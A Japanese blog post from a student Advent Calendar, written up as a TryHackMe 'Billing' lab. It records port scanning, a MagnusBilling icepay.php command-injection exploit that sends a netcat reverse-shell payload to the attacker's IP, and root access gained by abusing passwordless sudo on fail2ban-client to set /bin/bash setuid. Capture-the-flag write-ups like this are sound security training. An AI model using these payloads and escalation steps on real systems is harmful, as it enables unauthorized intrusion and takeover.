2
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

Day 20

Qiita全国学生対抗戦 Advent Calendar 2025

@kurimochi

Writeup: TryHackMe/Billing

2
Posted at

はじめに

Qiitaではお久しぶりです。SECCON 14 QualsやTSG CTFで「おれは!!!!弱いっ!!!!」になっていますKurimochiです。
そんな私ですが久しぶりにTryHackMeで自力SolveできたのでここにWriteupでも残そうと思います。

Enumerate

とりあえずポートスキャン。

$ rustscan -a 10.49.148.49 --ulimit 5000 -- -sCV -A -Pn

[!] Looks like I didn't find any open ports for 10.49.148.49. This is usually caused by a high batch size.

*I used 4500 batch size, consider lowering it with 'rustscan -b <batch_size> -a <ip address>' or a comfortable number for your system.

 Alternatively, increase the timeout if your ping is high. Rustscan -t 2000 for 2000 milliseconds (2s) timeout.

バッチサイズが大きいようです。-b 2000で対応します。

$ rustscan -b 2000 -a 10.49.148.49 --ulimit 5000 -- -sCV -A -Pn

[~] Automatically increasing ulimit value to 5000.
Open 10.49.148.49:22
Open 10.49.148.49:80
Open 10.49.148.49:3306
Open 10.49.148.49:5038
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -A -Pn" on ip 10.49.148.49
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-23 20:41 +0900

PORT     STATE SERVICE  REASON  VERSION
22/tcp   open  ssh      syn-ack OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 d2:85:3e:5f:04:36:d2:04:32:37:9f:2d:80:a0:7a:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPMvzkf5Ny5VSaKTboAYxdqh2qwPHVkM407zeLPDjrrPpPHwha+yxgFy82D0h0N1gaMoN4nK1l9Uh91UDqA7HX8=
|   256 51:b7:a3:f8:66:42:55:dd:ed:89:c6:2b:6f:39:88:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM3lELkmSfRo6Ec9XHDQZ0JzBWBHpwU7SUf806yL40Ez
80/tcp   open  http     syn-ack Apache httpd 2.4.62 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/mbilling/
| http-title:             MagnusBilling
|_Requested resource was http://10.49.148.49/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open  mysql    syn-ack MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open  asterisk syn-ack Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTPを確認してみるとログインフォームが現れます。MagnusBillingというサービスのようです。

image.png

image.png

Initial Access

さて、MagnusBilling exploitと検索してみるとこんなものが出てきました。

リバースシェルが張れるようです。バージョンわからないので確証はありませんが...

とにかく試してみましょう。

$ uv run --with requests exploit.py -t 10.49.148.49 -a 192.168.195.41 -p 4444
=== Magnus Billing System v7 Exploit by Tinashe Matanda(SadNinja) ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.49.148.49/mbilling/lib/icepay/icepay.php
[+] Attacker: 192.168.195.41:4444
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.195.41 4444 >/tmp/f;

$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.49.148.49 52034
sh: 0: can't access tty; job control turned off
$ whoami
asterisk

できちゃいました...
一応シェルを安定化させておきましょう。

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
asterisk@ip-10-49-148-49:/var/www/html/mbilling/lib/icepay$ ^Z
zsh: suspended  nc -lvnp 4444

$ stty raw -echo; fg
[1]  + continued  nc -lvnp 4444

Privilege Escalation

現在アクセスしているユーザーはasteriskですが、sudo -lを見てみるとパスワード無しでsudoとして/usr/bin/fail2ban-clientが実行できるようです。

asterisk@ip-10-49-148-49:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on ip-10-49-148-49:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-49-148-49:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client

fail2ban client sudo privescで検索すると、次の記事が出てきました。

この通りに実行してみます。

asterisk@ip-10-49-148-49:/home/magnus$ sudo /usr/bin/fail2ban-client status
Status
|- Number of jail:	8
`- Jail list:	ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-49-148-49:/home/magnus$ sudo /usr/bin/fail2ban-client get sshd
2025-12-23 02:19:22,683 fail2ban                [3060]: ERROR   NOK: ('list index out of range',)
Sorry but the command is invalid
<ome/magnus$ sudo /usr/bin/fail2ban-client get sshd actions
The jail sshd has the following actions:
iptables-multiport
<ome/magnus$ sudo /usr/bin/fail2ban-client set sshd addaction evil
evil
< set sshd action evil actionban "chmod +s /bin/bash"
chmod +s /bin/bash
<ome/magnus$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.5
1
asterisk@ip-10-49-148-49:/home/magnus$ /bin/bash -p
bash-5.2# whoami
root

ここでは適当にsshdのjailを利用しましたが、無事rootに権限昇格できました。

Get Flags

bash-5.2# cat /home/magnus/user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
bash-5.2# cat /root/root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
2
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?